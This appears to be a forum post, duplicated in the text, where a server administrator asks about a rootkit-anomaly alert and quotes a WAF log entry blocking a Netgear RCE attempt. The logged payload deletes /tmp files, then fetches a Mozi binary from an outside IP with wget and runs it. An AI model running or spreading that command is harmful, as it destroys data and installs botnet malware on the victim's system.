- Anomaly detected in file /tmp/#sql_80d_2.MAD. Hidden from stats, but showing up on readdir. Possible kernel level rootkit.
There was a number of these log entries around the same time:
- IM360 WAF: Netgear unauthenticated RCE||T:APACHE||MVN:ARGS:cmd||MV:rm -rf /tmp/*;wget http://202.88.219.141:50021/Mozi.m -O /tmp/netgear;sh netgear||
I don’t see #sql_80d_2.MAD in /tmp
It looks kind of nasty.
Any insight would be appreciated.
Thx
G
There was a number of these log entries around the same time:
- IM360 WAF: Netgear unauthenticated RCE||T:APACHE||MVN:ARGS:cmd||MV:rm -rf /tmp/*;wget http://202.88.219.141:50021/Mozi.m -O /tmp/netgear;sh netgear||
I don’t see #sql_80d_2.MAD in /tmp
It looks kind of nasty.
Any insight would be appreciated.
Thx
G
Comment